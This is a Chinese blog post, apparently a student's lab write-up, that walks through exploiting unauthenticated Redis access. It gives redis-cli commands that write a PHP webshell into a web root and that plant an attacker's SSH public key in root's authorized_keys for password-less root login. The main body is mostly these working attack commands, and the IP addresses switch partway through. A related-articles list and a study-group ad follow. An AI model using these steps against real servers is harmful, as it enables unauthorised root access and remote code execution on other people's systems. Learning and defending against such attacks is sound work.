Redis未授权访问漏洞的利用

最新推荐文章于 2023-10-09 19:56:45 发布
最新推荐文章于 2023-10-09 19:56:45 发布
阅读量180 收藏
点赞数
分类专栏: 网络安全 内网渗透 科技公开课程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L18296069161/article/details/103984370
版权
本文详细介绍了两种Redis未授权访问的利用方法:一是通过Redis写入webshell,实现远程代码执行;二是结合SSH key文件,将公钥写入目标机器的authorized_keys,进而实现免密登陆。
摘要由CSDN通过智能技术生成

1、利用redis写webshell
在redis-cli中写入以下命令:
config set dir /var/www/html/

config set dbfilename redis.php

set webshell “<?php phpinfo(); ?>”

save
在这里插入图片描述
然后看一下目录下是否生成了一个redis.php的文件
在这里插入图片描述

可以看到生成了,查看一下文件的内容
在这里插入图片描述
在浏览器中访问一下这个文件,成功解析,内容改成一句话木马,即可getshell
在这里插入图片描述

2、Redis 未授权访问配合 SSH key 文件利用
首先在攻击机生成密匙:ssh-keygen –t rsa
在这里插入图片描述

看到生成的文件被保存在了上图的路径中,cd /root/.ssh/,并cat查看文件内容
在这里插入图片描述

然后将公钥写入key.txt中
(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > key.txt
在这里插入图片描述

然后连接redis进行写入
$ cat key.txt | redis-cli -h 192.168.136.133 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.136.133:6379> config set dir /root/.ssh/
$ 192.168.1.11:6379> config set dbfilename “authorized_keys”
$ 192.168.1.11:6379> save
在这里插入图片描述

然后去目标机看一下是否生成
在这里插入图片描述

然后回到攻击机,利用自己的密钥进行ssh登录:
ssh –i id_rsa root@192.168.136.133
在这里插入图片描述

2646692244领取学习资料及工具联系管理员,学习可以进群773617250与大家学习交流!

                                                  BY易锦教育正式班学员墨森
L18296069161
关注
专栏目录
Redis授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1368
redis授权访问漏洞是一个由于redis服务版本较低其设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用
渗透测试-Redis授权访问漏洞利用
cdyunaq的博客
12-24 1198
危害 信息泄露 系统信息 redis保存的信息 写文件GetShell 在Web目录中写入webshell 写入SSH公钥直接连接 写入计划任务(corntab)反弹shell 高级利用 主从复制getshell(4.x version < 5.0.5) 模块加载执行命令(> 4.x) 环境准备 机型 ip 服务 版本 攻击机
Redis授权漏洞环境搭建复现问题解决
身高两米不到的博客
03-17 704
一:搭建环境卸载重装几次,翻看几十篇文章最后复现成功,因此记录一下 环境VMware,两台主机使用NAT模式连接 Kali 192.168.209.129 CentOS7 192.168.209.128 二:CentOS搭建redis,以root权限开启虚机 (1).下载安装包 wget http://download.redis.io/releases/redis-4.0.6.tar.gz 解压 tar -zxvf redis-4.0.6.tar.gz (2).red
Redis漏洞【总结】授权访问复现与利用
qq_45300786的博客
04-20 1486
【Linux】安装httpd+php 一、安装redis服务 kali:192.168.100.23 靶机(centos):192.168.100.20 靶机(centos)安装redis服务 wget http://download.redis.io/releases/redis-2.8.17.tar.gz (如果下载不下来的话:http://distfiles.macports.org/redis/) 解压安装包:tar xzf redis-2.8.17.tar.gz 进入redis目录:cd r
redis利用总结
qq_56426046的博客
09-28 1249
kali安装redis-clikali监听9999端口远程访问不了把protected-mode改成no另一种代码形式。
redis更改config set dir后save报错问题解决 报错为: Failed opening .rdb for saving: Read-only file system
weixin_45805993的博客
12-16 2365
Stack Overflow牛批,CSDN上找了一周都找到解决办法 具体来说就是要改/etc/systemd/system/redis.service这个配置文件 这个配置文件中有一些关于redis允许读和写的目录,把你想允许他写的目录放在ReadWriteDirectories=后面就好了 其次权限给满,能想到的都给777 像/etc/redis /var/lib/redis, 再加root启动应该 就行了!! 参考链接https://stackoverflow.com/questions/44814.
Redis授权最全利用方式
swordheart的博客
01-10 2596
0x00 利用计划任务反弹shell 靶机地址:192.168.230.142 kail地址:192.168.230.128 启动靶机redis docker环境
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问漏洞
周星星的博客
08-22 1574
Redis授权访问漏洞复现以及利用
Redis授权如何访问漏洞
L18296069161的博客
01-17 116
1、利用redis写webshell 在redis-cli中写入以下命令: config set dir /var/www/html/ config set dbfilename redis.php set webshell “<?php phpinfo(); ?>” save 然后看一下目录下是否生成了一个redis.php的文件 可以看到生成了,查看一下文件的内容 在浏览器中...
Linux系统CentOS 7修改httpd服务Apache网站根目录/var/www/html
热门推荐
雨打芭蕉的博客
04-01 4万+
本文基于阿里云服务器CentOS7.4 讲述,如果文中有错误或者不足,敬请在评论区指出昨天我写了一篇博客讲述CentOS 7安装部署httpd服务,在安装部署好httpd服务后,访问公网IP可以正常访问,默认Apache网站根目录/var/www/html,如果我们要修改为自定义的目录路径怎么办呢?1、执行vim /etc/httpd/conf/httpd.conf指令键盘输入E,进人可编辑模式2...
Redis利用方式总结(Linux/Windows)
J0o1ey Blog
05-24 1992
简述 本文收录整理了https://xz.aliyun.com/t/7940 https://www.redmango.top/article/51 等文章 感谢作者们无私分享利用redis优秀姿势,整理后方便大家查阅 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis支持主从同步。数据可以从主服务器向任意数量的从服务器上同步,从服务
redis
chibazhen9407的博客
02-24 823
Redis介绍 • Redis和Memcached类似,也属于k-v数据存储 • Redis官网redis.io •支持更多value类型,除了和string外,还支持hash、lists(链表)、sets(集合)和sorted sets(有序集合) • redis使用了两种文件格式...
Redis授权访问漏洞实验
最新发布
qq_60256199的博客
10-09 3274
Redis是一个开源的内存数据库管理系统,它被广泛用于缓存、消息队列和实时数据分析等应用场景。Redis支持多种数据结构,包括字符串、列表、集合、有序集合和哈希表,可以通过简单的键值对方式存储和检索数据。由于其高性能和低延迟特性,Redis常用于加速数据访问,提高应用程序的响应速度。此外,Redis还提供了持久化选项,允许数据在重启后仍然可用,使其适用于各种持久性存储需求。这一特性使得Redis成为了一个非常强大的数据存储和缓存解决方案,特别适用于需要快速读写操作的应用场景。
Redis持久化机制介绍
拓拓的博客
04-15 348
Redis支持RDB和AOF两种持久化机制,持久化可有效避免因进程退出造成的数据丢失问题。 5.1 RDB RDB持久化是把当前进程数据生成快照保存到硬盘的过程,触发RDB过程分为手动触发和自动触发。 5.1.1 触发机制 手动触发分别对应save和bgsave命令: save命令:阻塞当前Redis服务器,直到RDB过程完成为止,对内存较大的实例会造成长时间阻塞,线上...
SSRF漏洞
m0_65041566的博客
05-28 385
SSRF 服务器端请求伪造,攻击目标一般是从外网无法访问的内部系统 成因 服务器提供,从其他服务器获取资源,但没有对目标地址进行过滤,而大多数web构架中的服务器可以访问内网资源 利用方法 扫描内网ip,端口,以及主机的存活状况,获取banner(主机信息) 进行内网服务 攻击内网web服务 利用file协议读取数据 出现位置 社交共享功能:如分享的超链接 转码服务 在线翻译 图片文章的下载,保存 。。。。 相关函数 file_get_contents() 将文件或url所
授权漏洞总结
weixin_45682070的博客
11-06 1196
前言 今年5月,比特币勒索病毒 WannaCry 席卷全球,国内众多机构部门计算机系统瘫痪。根据之前应急响应的案例分析,以及一些安全报告统计,目前大部分的勒索病毒均利用授权访问等通用漏洞进行植入、勒索,尤其是 Redis、MongoDB 等数据库的授权访问漏洞尤其严重。参见《【脉搏译文系列】如何高效的应对勒索软件》 0x01 介绍 授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。 目前主要存在授权.
redis中关于config get、config set与config rewrite
wukong_666的博客
07-22 6169
redis服务器在启动的时候所有参数的设定都是通过缺省或指定的配置文件获取,在这些参数中有些在服务器启动后是无法修改的,但是有些参数则可以通过redis提供的config get和config set实时地获取和修改。 我们可以通过在客户端执行“config get *”这个命令查看参数。 我们可以通过在客户端执行“config set”这个命令来实时修改参数。 但是,用“confi
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值